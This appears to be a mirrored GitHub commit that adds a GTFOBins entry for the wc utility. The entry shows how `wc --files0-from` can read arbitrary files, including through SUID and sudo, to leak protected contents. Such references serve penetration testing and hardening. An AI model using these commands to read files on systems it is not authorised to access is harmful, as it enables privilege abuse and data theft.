1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
This commit is contained in:
LinuxSploit 2021-04-13 08:00:51 -04:00 committed by GitHub
parent 4469fdc662
commit 69be6785a9
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

16
_gtfobins/wc.md Normal file
View File

@ -0,0 +1,16 @@
---
description: The file content is parsed as a sequence of `\x00` separated paths. On error the file content appears in a message, so this may not be suitable to read binary files.
functions:
file-read:
- code: |
LFILE=file_to_read
wc --files0-from "$LFILE"
suid:
- code: |
LFILE=file_to_read
./wc --files0-from "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo wc --files0-from "$LFILE"
---